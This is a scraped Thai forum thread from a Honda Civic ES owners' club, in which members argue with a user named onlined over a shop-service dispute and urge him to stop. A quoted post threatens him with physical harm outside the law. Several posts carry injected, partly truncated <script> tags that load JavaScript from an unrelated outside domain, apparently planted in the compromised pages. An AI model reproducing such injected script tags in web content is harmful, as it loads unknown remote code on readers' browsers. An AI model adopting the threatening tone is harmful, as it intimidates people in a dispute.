หัวข้อนี้ถูกล็อก คุณไม่สามารถแก้ไข หรือตอบได้
เสก

ชื่อเล่น: เสก

เข้าร่วม: 26 กันยา 2012
ตอบ: 1727

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2214
ให้คำขอบคุณ: 997

ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 27 กุมภา 2013 22:49 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
ทุกอย่างจะดีขึ้นครับ คิดบวก+
onlined

เข้าร่วม: 19 สิงหา 2012
ตอบ: 70

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 235
ให้คำขอบคุณ: 0

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 27 กุมภา 2013 22:52 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
YINDEE พิมพ์ว่า:

ใครเค้าอยากรู้เรื่องของมึงวะ?
สังวรในหัวสมองไว้เลยว่า "ระวังตัวไว้นะ"
อยากมีปัญหานักเดี๋ยวกูจัดให้!
ไปไหนมาไหน ถ้าเจอESแต่งหรือไม่แต่ง.....อาจเจอของจริงนะ
วันนี้หลายคนอาจรู้แล้วว่ามึงเป็นใคร? รับลองสนุกแน่
เตือนกันดีๆไม่ฟัง สิ่งที่มึงทำ คดีแพ่งนะ ทั้งหมิ่นทั้งเสียชื่อเสียงของเค้า
เอากฏหมายเล่นงานก็ได้ หรือ จะนอกกฏหมายก็ได้
ที่นี่ก็มีกฏระเบียบกฏเกณฑ์ที่เค้าปฏิบัติกันมาเป็น 10ปีแล้วมึงรับม่ได้มึงก็ไม่ต้องอยู่ รีบไสหัวมึงไปจากที่นี่ซ๊ะ อย่าให้คนอื่นต้องมาไล่เลยกูอายแทนหว่่ะ.......

ไป๊!

ขอบคุณครับ สำหรับความหวังดีและคำเตือน 
คุณลูกผู้ ช ตัวจริงหรือเปล่าครับ ?? มีการเตือนผม ให้ระวังตัว  ถ้าเจอผมข้างนอก 

ทั้งๆที่ผมไม่ได้หาเรื่องคุณ เรื่องนี้ผมยอมรับผมกัวครับ  ผมไม่สู้คน

ผมได้สร้างศัตรูใว้เยอะมาก สาเหตุมาจากการบริการแย่ๆ ของร้านที่ทุกคนออกมาปกป้อง

และวันนี้ผมพิสูจนให้คนในบอร์ดได้เห็นแล้วว่า สุดท้ายผมก็เจ็บเอง ผิดเต็มๆ เพราะว่า กฎหมู่อยู่เหนือหลักความจริงครับ

เรื่องกฎหมายผมรู้ครับ  ผมจบเรียนทางด้านกฎหมายมา ทำงานก็เกี่ยวกะกฎหมาย แต่ผมอดใจไม่ไหวจริงๆ ที่จะทำผิดกฎหมายซะเอง

เห็นไหมละครับ ตัวจริง คนจริงเขามาไล่ผมแล้ว ถ้าอย่างนั้นผมขอตัวนะครับ
ได้รับคำขอบคุณจาก: Guide6351 
bambooyo5

เข้าร่วม: 05 พฤศจิกา 2012
ตอบ: 135

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 113
ให้คำขอบคุณ: 14
พุธ, 27 กุมภา 2013 22:59 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
YINDEE พิมพ์ว่า:
จบได้ยังครับ? ถ้าไม่จบ เดี๋ยวผมจะจัดการให้มันจบให้

สังคมเค้าอยู่กันดีๆ ด้วยเหตุและผล

ถ้าเอาการเมืองมายุ่ง เดี๋ยวก็จะยุ่งให้ด้วย คนเห็นต่างมีเย๊อะ   

อยากนั่งคุยกันไหม  อย่าเก่งกันหลังคีย์บอร์ด

มาคุยกัน มาเคลียร์กัน อย่ามาทะเลาะกันในนี้ ไม่ชอบหว่ะ

สาธารณะก็จริงแต่ไม่ใช่ว่าจะทำไรก็ได้ตามใจทุกอย่าง

ที่นี่ไม่มีนักเลง ไม่มีศัตรู  ที่นี่มีแต่เพื่อน จำไว้ครับ

ไม่ต้องพิมพ์และ +++++++
ได้รับคำขอบคุณจาก: aunja 
Pluak_Ka

เข้าร่วม: 13 มกรา 2012
ตอบ: 53

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 200
ให้คำขอบคุณ: 4
พุธ, 27 กุมภา 2013 23:00 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
onlined พิมพ์ว่า:

...

ผมได้สร้างศัตรูใว้เยอะมาก สาเหตุมาจากการบริการแย่ๆ ของร้านที่ทุกคนออกมาปกป้อง

...

สุดท้ายผมก็เจ็บเอง ผิดเต็มๆ เพราะว่า กฎหมู่อยู่เหนือหลักความจริงครับ

...

เรื่องกฎหมายผมรู้ครับ  ผมจบเรียนทางด้านกฎหมายมา

...

ทำงานก็เกี่ยวกะกฎหมาย

...

แต่ผมอดใจไม่ไหวจริงๆ ที่จะทำผิดกฎหมายซะเอง

...

kan32737

เข้าร่วม: 30 เมษา 2012
ตอบ: 135

ได้รับคำขอบคุณ: 155
ให้คำขอบคุณ: 0

พุธ, 27 กุมภา 2013 23:12 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
อ่านมาตั้งแต่ต้น หยุดทีครับ ตอนแรกเห็นใจนะ แต่ตอนนี้ผมว่าคุณ มันไม่จบ โทษนู่นนี่นั่น พอฝ่ายนู้นเขามารับผิดชอบ ก็ไม่เอา เรื่องมากจิงๆ คอยดูพอผมโพสอย่างนี้ต้องมีการตอบโต้แน่ๆ ผมไม่เข้าข้างร้านหลอกบอกไว้เลย เคยโดนเหมือนกันร้านเดียวกันนี่แหละ แต่ผมแก้ปัญหานี้ได้ ด้วยการพูดคุยกะเขาตรงๆ ว่าเราไม่พอใจหรืออะไรทำไม่ดี เขาก็ทำให้ใหม่นะคับ.

ผมเชื่อว่าหลายคนในที่นี้ก็ต้องเคย เพราะไม่ว่าร้านไหนมันก็ทำเสียได้หมดหมด แต่การแก้ปัญหามันต่างกัน ถ้าแค่นี้แก้ปัญหาไม่ได้ จะจบปริญญาเอกมาก็ เท่านั้น

คิดดูดีๆ นะ
ได้รับคำขอบคุณจาก: aunja  ballanupong 
Cra2yLov3

ชื่อเล่น: จุ่น

เข้าร่วม: 01 กุมภา 2012
ตอบ: 490

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 580
ให้คำขอบคุณ: 358

ปี: 2004
พุธ, 27 กุมภา 2013 23:23 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
onlined พิมพ์ว่า:

Cra2yLov3 พิมพ์ว่า:
มีทางออกให้ครับ คุณ onlined อันดับแรกเลย ขายรถทิ้งเลยครับ แล้วนั้งรถเมย์ หรือ แท็กซี่เอา เท่านี้คุณก็ไม่ต้องซ่อมรถแล้วครับ เหตุการนี้ก็จะ

ไม่เกิดขึ้นเท่านี้รถก็จะติดน้อยลง ผมจะได้ขับรถสบายขึ้น

ขอบคุณสำหรับทางออกครับ คุณพูดได้ดีนะครับ

ผมขายต่อให้คุณ 500,000 ถ้าคุณเอาจัดมาครับ รถปี 05 สีขาว 1.7 vtec abs airbag ติดแก๊ส วิ่งมา ประมาณ 25X,XXX โล

ถ้าทำไม่ได้ก็อย่าพูดครับ ถ้าคิดจะมาดูรถเล่นๆเพื่อจะมาเจอผม อย่ามาดู

ผมไม่ซื้อคับ รถคุณ ปีกนกเป็นรอย
ได้รับคำขอบคุณจาก: aunja  akkarin_c  tonaff  DEAR ES 02  K_series  สมชาย  Ton-  ballanupong  lkki5  YINDEE  cisco 
momoSTANDBY

ชื่อเล่น: โม

เข้าร่วม: 26 พฤษภาคม 2011
ตอบ: 177

ได้รับคำขอบคุณ: 305
ให้คำขอบคุณ: 171

สี: แดง ไฟร์เปปเปอร์ (R-507P)
พุธ, 27 กุมภา 2013 23:26 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
^^ นอกเรื่อง 555+ ไม่เครียดๆ
เอ่อ ตกลง มี ใครพอรู้ไหมครับ ว่า คอนโซล หน้า DC5 .ใส่ยังไง หรือ มี ร้านไหนรับใส่ หรือจะใส่เองดี น้าาครับ
ได้รับคำขอบคุณจาก: aunja  สมชาย  ballanupong 
bankabby

ชื่อเล่น: แบงค์

เข้าร่วม: 10 มิถุนา 2012
ตอบ: 1504

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1642
ให้คำขอบคุณ: 2485

สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 27 กุมภา 2013 23:41 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
ล้อหน้าซ้าย เวลาลงหลุม หรือ ขึ้นเนิน จะมีเสียงดัง กุ๊ก กุ๊ก

ต้องเปลี่ยนอะไรบ้างครับ เสียงนี้ถึงจะหายไป

**โทษทีครับ ผิดกระทู้
ได้รับคำขอบคุณจาก: momoSTANDBY  aunja  ballanupong 
coromant

เข้าร่วม: 09 ตุลา 2008
ตอบ: 5132

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6854
ให้คำขอบคุณ: 719
พุธ, 27 กุมภา 2013 23:41 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
momoSTANDBY พิมพ์ว่า:
^^ นอกเรื่อง 555+ ไม่เครียดๆ
เอ่อ ตกลง มี ใครพอรู้ไหมครับ ว่า คอนโซล หน้า DC5 .ใส่ยังไง หรือ มี ร้านไหนรับใส่ หรือจะใส่เองดี น้าาครับ

มีรุ่นน้องใส่แต่ระบบแอร์ยังไม่จบ
ได้รับคำขอบคุณจาก: momoSTANDBY  aunja  koobe  DuuI  ballanupong 
ค้าอะไหล่โคตรเก่า

เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 27 กุมภา 2013 23:47 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
คนนี้มันพระเอกเกาหลีชัดๆอ่ะ
ได้รับคำขอบคุณจาก: aunja  koobe  ballanupong 
Sak_es5442

ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2012
ตอบ: 815

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1250
ให้คำขอบคุณ: 2956

พุธ, 27 กุมภา 2013 23:58 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
ตามนั้น
ได้รับคำขอบคุณจาก: aunja  koobe 
a_na_kim

ชื่อเล่น: คิม

เข้าร่วม: 02 สิงหา 2011
ตอบ: 474

ได้รับคำขอบคุณ: 274
ให้คำขอบคุณ: 1

ปี: 2002
พฤหัส, 28 กุมภา 2013 00:06 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
วัตถุประสงค์
เพื่อเป็นศูนย์กลางในการแนะนำ ซักถาม แก้ไขปัญหาระหว่างรถรุ่นเดียวกัน
เพื่อพบปะพูดคุย และสังสรรค์ระหว่างกลุ่มคนที่ใช้รถรุ่นเดียวกัน และไม่มีการแบ่งแยกกลุ่มหรือทีม เพราะทุกคนคือ ES

meeting
จะทำการ meeting ทุกเสาร์ที่ 3 ของทุกเดือน ทางคลับจะประกาศให้ทราบก่อน 1 อาทิตย์ว่าจะมิตติ้งที่ไหน
ซิ่งสามารถมาสมัครสมาชิกในวัน meeting

จะมีการร่วมการรับประทานอาหารร่วมกันในวัน meeting (ครั้งเว้นครั้งหรือตามความเหมาะสม)
อยากให้สมาชิกทานข้าวร่วมกันทุกครั้งที่มี เพื่อจะได้ทำความรู้จักกันให้มากยิ่งขึ้น ซึ่งจะมีค่าใช้จ่ายประมาณคนละ 350 บาท ซึ่งตรงนี้บางคนอาจจะมองว่าแพงไม่คุ้ม แต่อยากให้คิดว่าแค่เดือนเว้นเดือนที่มีการทานข้าว คิดง่ายๆ 2 เดือน หยอดกระปุกวันละ 5 บาท ก็สามารถมาร่วมทานข้าวได้แล้ว

กฏกติกามารยาทในการใช้บอร์ด
บอร์ดนี้เป็นบอร์ดสาธารณะ ซึ่งทุกคนมีสิทธิ์ในการตั้งกระทู้ ตอบกระทู้ในการซักถาม หรือซื้อขายสินค้าต่างๆ ในที่ที่จัดไว้ให้เท่านั้น

*ลงซื้อขายสินค้า พูดคุยเชิงพาณิชย์ พูดคุยเชิงธุรกิจ หรือ โฆษณาทุกรูปแบบ ใช้ห้องซื้อขายเท่านั้น

ไม่ควรตั้งกระทู้ และใช้รูปหรือข้อความรุนแรงที่จะก่อให้เกิดความไม่สงบทั้งในแง่ศีลธรรม จริยธรรม และล่อแหลมเกินไป (โดยการพิจารณาของผู้ดูแลบอร์ด) ไม่ควร post รูปอนาจารต่างๆ , ไม่ลงโฆษณาหรือธุรกิจ , อย่าดันหรือเพิ่มจำนวนกระทู้โดยไม่จำเป็น

ทางผู้ดูแลบอร์ดจะขอลบกระทู้ที่เห็นว่าไม่สมควรออกโดยไม่ต้องแจ้งให้ทราบก่อนล่วงหน้า

ท่านใดมีข้อสงสัย มีคำแนะนำและติชม สามารถส่งข้อความส่วนตัวมาทางผู้ดูแลบอร์ดได้โดยตรง ขอบคุณครับ 

ผมขออนุญาตแสดงความคิดเห็นหน่อยคับ.....ผมได้ติดตามตั้งแต่เริ่มต้นหัวข้อที่ถูกลบไป
ปัญหาหลักๆผมแยกไว้ 2 กรณี

1. ท่าน onlined ได้ไปใช้บริการร้านในเวปบอร์ดที่เป็นที่นิยมของเวป แล้วเกิดความเสียหายจากความบกพร่องของร้าน  
    ซึ่งท่านเป็นเจ้าของรถเกิดความไม่พอใจและได้โพส์ทรูปภาพและความเสียหายหลังจากการติดตั้งมา  
    ทางร้านที่ติดตั้งได้เห็นหรือมีเพื่อนสมาชิกบางท่านได้แจ้งไปที่ร้าน และทางร้านก็แสดงความรับผิดชอบความเสียหายนั้น ฃ
    โดยการชดใช้ค่าเสียหายให้ ..... ถึงตรงนี้ปัญหามันหาจะจบแต่ ... หรือคุณไม่พอใจในการชดเชยสินค้านั้น ...
2. ท่าน hacker มีหน้าที่ดูแลความเรียบร้อยของเวปบอร์ด ก็ทำตามหน้าที่ของท่าน .......

ผมไม่รู้จักใครเลยทั้ง 3 ท่าน ....  ผมว่าทุกท่านน่าจะมีวัยวุฒิ และคุณวุฒิ และความรับผิดชอบ น่าจะรู้จักหน้าที่ของแต่ละคน
สังคมในบ้านหลังนี้จะน่าอยู่ และอบอุ่น ด้วยการช่วยเหลือจากคนในบ้าน   ตามวัตถุประสงค์ของเวปนี้
ได้รับคำขอบคุณจาก: CROW  mayuct  Nine_Eleven  aunja 
aunja

ชื่อเล่น: อั๋น

เข้าร่วม: 08 มิถุนา 2012
ตอบ: 822

Guru ES
Guru ES

ได้รับคำขอบคุณ: 820
ให้คำขอบคุณ: 2141

สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 28 กุมภา 2013 00:08 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
bankabby พิมพ์ว่า:
ล้อหน้าซ้าย เวลาลงหลุม หรือ ขึ้นเนิน จะมีเสียงดัง กุ๊ก กุ๊ก

ต้องเปลี่ยนอะไรบ้างครับ เสียงนี้ถึงจะหายไป

**โทษทีครับ ผิดกระทู้

เปลี่ยนยางเบ้าโช้คครับถ้ามานขาด อิอิถามต่อใครมี
ร้านทำตู้แบนพาส ราคาประหยัดแนะนำด้วยครับอยู่แถวๆรังสิตยิ่งดีขอราคาด้วยจะเล่นเครื่องเสียงแหระ
AofStaR

ชื่อเล่น: อ๊อฟ

เข้าร่วม: 25 ธันวา 2011
ตอบ: 895

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1569
ให้คำขอบคุณ: 1125

พฤหัส, 28 กุมภา 2013 00:17 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
ขายกันสาดเทพ ไม่มีลายงา อิอิ
ได้รับคำขอบคุณจาก: Nine_Eleven  ballanupong 
akkarin_c

ชื่อเล่น: ตู่

เข้าร่วม: 01 สิงหา 2012
ตอบ: 1225

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1081
ให้คำขอบคุณ: 441

พฤหัส, 28 กุมภา 2013 00:21 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
โอนเงินแล้ว ครับ ปิดกระทู้
ได้รับคำขอบคุณจาก: ballanupong 
luckratchada

ชื่อเล่น: ลักษณ์

เข้าร่วม: 29 ธันวา 2011
ตอบ: 629

Guru ES
Guru ES

ได้รับคำขอบคุณ: 938
ให้คำขอบคุณ: 304

ปี: 2001
พฤหัส, 28 กุมภา 2013 00:27 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
Over_Boost พิมพ์ว่า:
ผมหาทางออกให้คร่าวๆนะครับ และหวังว่ามันจะจบ...ด้วยดี

ที่ผมทำ ผมเพียงแค่หวังดีต่อทุกฝ่ายนะครับ

คุณไม่กล้าเข้าไปทำใช่ไหม...โอเค ไม่เป็นไร คุณนัดเจอผมก็ได้ใกล้ๆแถวนั้น ผมจะขับรถคุณเข้าไปทำให้ แต่!!! ไม่ต้องกลัวผมจะขโมยรถพี่หรอก ผมให้พี่ยืนเฝ้ารถผมเลย ผมจะจอดไว้ตรงนั้น สำเนาบัตร ทะเบียนบ้านให้ด้วย ตามตัวได้แน่นอนถ้าผมตุกติก

พอทำเสร็จ ผมเดินกลับไปเอาให้แล้วขับมาคืนพี่...จบ วินและฟิน กันไป

ปล. รอไม่ต้องห่างร้านมากก็ได้ เดี๋ยวผมเอารถพี่ไปทิ้งไว้ให้ แล้วผมจะเดินกลับไปหาพี่ หาข้าวทานรอรถด้วยกัน โทรนัดเจ้าของอู่เลย ขอคิวหน่อย เคสเร่งด่วน

หรือ
ผมเอาไปส่งให้ไหมครับ กทม.ชลบุรี ผมชิลๆ ผมจะถือโอกาสพาแฟนไปเที่ยวทะเลด้วยเลย ไม่ต้องกลัวว่าผมจะขโมยหรือเนียนของชิ้นนี้หรอกครับ เพราะรถผมมีแล้ว และผมกล้าที่จะสำเนาเอกสารต่างๆทิ้งไว้ให้ทางร้านไว้เช่นกัน ของถึงมือแน่นอน

สนใจก็ลองตัดสินใจดูนะครับ

หรือไม่ไว้ใจผมและมีทางออกที่ดีทางอื่นก็ลองเสนอมาดูครับ อยากให้จบได้แล้ว มันยาวไปแล้ว

คนที่ตัดสินใจซื้อ ES ก็ืคือคนที่มีเจตนารมเดียวกัน รักใน ES เหมือนๆกัน และผมก็เชื่อว่าพี่ก็รักรถพี่

ปล. ไม่ต้องกลัวว่าผมจะ ตุกติกนะครับ พี่ผมเปิดอู่อยู่ในซอยนวลจันทร์ ถ้าผมตุกติก ไปตามหาผมได้ที่นั่น เพราะผมไปนั่งเล่นหลังเลิกงานเกือบทุกวัน ปากซอย สน.คันนายาว

คุณใจสุดๆเลยครับ ถ้าว่างๆผมเข้าไปหาน่ะครับ ผมอยู่ลาดพร้าว101 ไม่ไกลครับ

ได้รับคำขอบคุณจาก: thammarong007  Nine_Eleven  aunja 
aunja

ชื่อเล่น: อั๋น

เข้าร่วม: 08 มิถุนา 2012
ตอบ: 822

Guru ES
Guru ES

ได้รับคำขอบคุณ: 820
ให้คำขอบคุณ: 2141

พฤหัส, 28 กุมภา 2013 00:36 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
akkarin_c พิมพ์ว่า:

มาไวไปไวมากๆ
ได้รับคำขอบคุณจาก: ballanupong 
luckratchada

ชื่อเล่น: ลักษณ์

เข้าร่วม: 29 ธันวา 2011
ตอบ: 629

Guru ES
Guru ES

ได้รับคำขอบคุณ: 938

ปี: 2001
พฤหัส, 28 กุมภา 2013 00:37 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
eskung พิมพ์ว่า:
ผมเฝ้าดูกระทู้นี้ด้วยความเป็นห่วงมาตั้งแต่ต้นครับ เกรงว่าทะเลาะกันไปโพสต์กันมา THANK กันไปโต้กันมา หวั่นว่างานนี้มันต้องมีคนขึ้นตัวเขียวแทนผมแน่ๆ นี่ถ้าใครขึ้นตัวเขียวแทนผมเพราะกระทู้นี้นะ คอยดูดิผมจะแช่งให้ขี้แตกเลยคอยดุละกัน<script src="https://sport32news.com/civicesgroup.js"></

ไม่เอา ไม่เคียดแค้นกันน่ะครับ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
Snook

ชื่อเล่น: สนุ๊ก

เข้าร่วม: 13 ธันวา 2012
ตอบ: 236

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 565

พฤหัส, 28 กุมภา 2013 00:39 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
ไปกินก๋วยเตี๋ยวกัน"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: DELL 
smokie

ชื่อเล่น: เหนือ

เข้าร่วม: 24 ตุลา 2008
ตอบ: 460

ได้รับคำขอบคุณ: 783
ให้คำขอบคุณ: 668

พฤหัส, 28 กุมภา 2013 00:58 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
ถอยกันคนละก้าว เพราะยิ่งก้าวมันก้อเริ่มยาว
ปํญหาของแต่ละคนก้อลองหยุดไว้ก่อน ถึงมันจะไม่จบก้อคงไม่เป็นไรแล้วละ
เพราะดูๆไปแล้วหลังก้อเริ่มจะกลายเป็นเถียง กันไปๆมาๆวนซ้ำซ้อน

ประเด็นนี้ ต่างคนต่างเก็บปัญหากลับไป คนไทยลืมง่ายครับ !!!!
meseoul

ชื่อเล่น: บุ๊ค

เข้าร่วม: 22 กรกฎา 2012
ตอบ: 376

ได้รับคำขอบคุณ: 263
ให้คำขอบคุณ: 920

พฤหัส, 28 กุมภา 2013 01:19 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
aunja พิมพ์ว่า:

มาไม่เคยทันกับเค้าซักที 
K_series

เข้าร่วม: 01 ตุลา 2008
ตอบ: 3032

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 22059
ให้คำขอบคุณ: 6045
พฤหัส, 28 กุมภา 2013 05:05 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
เหมือนเถียงกะเด็กวนไปวนมา ไม่จบซะที
ได้รับคำขอบคุณจาก: Nine_Eleven  ballanupong  CoolMo  koobe 
ค้าอะไหล่โคตรเก่า

เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
พฤหัส, 28 กุมภา 2013 07:33 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
AofStaR พิมพ์ว่า:

พูดคุยในเชิงพานิชให้ใช้ห้องซื้อขายเท่านั้น ทำไมพี่ไม่ทำตามกฏครับพี่เดี๋ยวก็เกิดปัญหาขึ้นอีกหรอก<script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: Nine_Eleven 
hacker

ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

พฤหัส, 28 กุมภา 2013 08:32 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
ผมบอกคุณแล้ว Onlined ว่าคุณแพ้ภัยตัวเอง

นิสัยของเรา ตัวเราดูไม่รู้หรอก ต้องให้คนอื่นเค้าบอกเค้าสื่อ

จากการกระทำของคุณ เพื่อนๆก็ออกมาเตือน
ออกมาเป็นกระจกให้คุณดูภาพสะท้อนของตัวเองแล้ว

มองดูตัวเองซะ ปรับเปลี่ยนพฤติกรรมซะ สังคมเค้ายังให้อภัย

คุณจะได้ไม่โทษคนอื่นว่าคนอื่นทำให้คุณไม่มีจุดยืน
a_bug

ชื่อเล่น: กอล์ฟ

เข้าร่วม: 31 มีนา 2012
ตอบ: 486

ได้รับคำขอบคุณ: 757
ให้คำขอบคุณ: 107

พฤหัส, 28 กุมภา 2013 09:03 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
พอเถอะครับ ไม่ต้องโพสอะไรเพิ่มแล้ว ไม่งั้นคุณทั้งสองคนก็จะไม่ต่างกัน

คำสอนของพระพุทธเจ้า ต่อองคุลิมาล เข้ากับยุคเผาบ้าน ทำลายเมือง

องคุลีมาลตะโกนลั่น "หยุด พระหยุดก่อน"

พระพุทธองค์ทรงก้าวเดินอย่างช้าๆและมั่นคง ...ไม่สะทกสะท้าน

เมื่อองคุลีมาลวิ่งไล่ทันพระพุทธเจ้าแล้ว เขาเดินเคียงไปกับพระองค์พร้อมกับพูดว่า

"นี่พระ ข้าบอกท่านให้หยุด ไฉนท่านจึงไม่หยุด"

พระพุทธองค์ทรงดำเนินต่อไปและตรัสว่า "องคุลีมาล ตถาคตหยุดมานานแล้ว ท่านสิยังไม่หยุด"

องคุลีมาล " พระ ท่านบอกว่า ท่านหยุดมานานแล้ว แต่ท่านยังเดินอยู่นี่ และท่านยังบอกอีกว่า ข้านั่นแหละยังไม่หยุด ท่านหมายความว่าอย่างไร"

พระพุทธองค์ " องคุลีมาล ตถาคตหยุดนานแล้วจากการก่อกรรมที่สร้างความทุกข์ให้แก่ชีวิตผู้อื่น ตถาคตมีแต่ถนอมรักษาชีวิตทั้งปวง ไม่เฉพาะแต่ชีวิตมนุษย์ องคุลีมาลชีวิตทั้งปวงย่อมต้องการมีชีวิตอยู่ ทุกชีวิตย่อมกลัวความตาย เราหล่อเลี้ยงหัวใจแห่งความกรุณาและปกป้องชีวิตของทั้งปวง"

องคุลีมาล "มนุษย์ไม่รักกัน ทำไมข้าจึงต้องรักคนพวกนั้นด้วยเล่า มนุษย์โหดร้ายและปลิ้นปล้อน ข้าจะไม่หยุดจนกว่าจะฆ่าพวกมันให้หมด"

พระพุทธองค์ "องคุลีมาล ตถาคตรู้ว่าท่านมีความทุกข์จากความเลวร้ายของมนุษย์คนอื่น บางครั้งมนุษย์ก็เลวร้ายอย่างที่สุด ความเลวร้ายเช่นนั้น เกิดจากความโง่เขลา ความเกลียดชัง ความอยาก และความริษยา แต่มนุษย์ก็มีปัญญา และความเมตตาด้วยเช่นกัน .......องคุลีมาล ในโลกนี้อาจจะมีคนใจร้าย แต่ก็มีคนใจดีอยู่มากมายด้วย ขออย่าได้ปิดตารับรู้ความจริง มรรคาของตถาคตสามารถเปลี่ยนความโหดร้ายเป็นความกรุณา ความเกลียดชังเป็นหนทางที่ท่านกำลังเกินอยู่เวลานี้ ท่านควรหยุด หันมาเลือกทางแห่งภัยทาน ความเข้าใจและความรัก"

องคุลีมาลหวั่นไหวในคำพูดของพรพุทธองค์ แต่กระนั้นจิตใจของจอมโจรก็สับสนวุ่นวายด้วยเช่นกัน..........(และถามว่าท่านเป็นพระสมณโคดม(พระพุทธเจ้า)หรือเปล่า)....

องคุลีมาล "เสียดายเหลือเกินที่ข้าพเจ้ามิได้พบพระองค์เร็วกว่านี้ ข้าพเจ้าเดินมาไกลในทางสายทำลายล้าง เป็นไปไม่ได้ที่จะหันหลังกลับ"

พระพุทธองค์ "หามิได้ องคุลีมาล ไม่มีอะไรสายเกินไปที่จะกระทำดี"

องคุลีมาล "กรรมดีอะไรที่ข้าพเจ้าจะทำได้"

พระพุทธองค์ " หยุดเดินบนเส้นทางแห่งความโกรธและความรุนแรง นั่นแล คือกรรมอันประเสริฐสุด องคุลีมาล แม้ทะเลแห่งความทุกข์จะกว้างใหญ่ไพศาล จงหันหลังกลับไปดู แล้วท่านจะแลเห็นฝั่ง"

ที่มา : คัดลอกและดัดแปลงบางส่วนจากหนังสือ คือเมฆสีขาว ทางก้าวเก่าแก่ เขียนโดย ติช นัท ฮันห์ แปลโดย รสนา โตสิตระกูลและสันติสุข โสภณสิริ
ได้รับคำขอบคุณจาก: สมชาย  Nine_Eleven  ballanupong  aunja  CROW 
Snook

ชื่อเล่น: สนุ๊ก

เข้าร่วม: 13 ธันวา 2012
ตอบ: 236

ได้รับคำขอบคุณ: 565

พฤหัส, 28 กุมภา 2013 09:24 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
เอ่อ....คือว่า ไปห้องน้ำทางไหนครับ"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: สมชาย 
3drom

ชื่อเล่น: ตุ้ย

เข้าร่วม: 19 กรกฎา 2011
ตอบ: 122

ได้รับคำขอบคุณ: 119
ให้คำขอบคุณ: 10

พฤหัส, 28 กุมภา 2013 09:34 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
hacker พิมพ์ว่า:
ผมบอกคุณแล้ว Onlined ว่าคุณแพ้ภัยตัวเอง

นิสัยของเรา ตัวเราดูไม่รู้หรอก ต้องให้คนอื่นเค้าบอกเค้าสื่อ

จากการกระทำของคุณ เพื่อนๆก็ออกมาเตือน
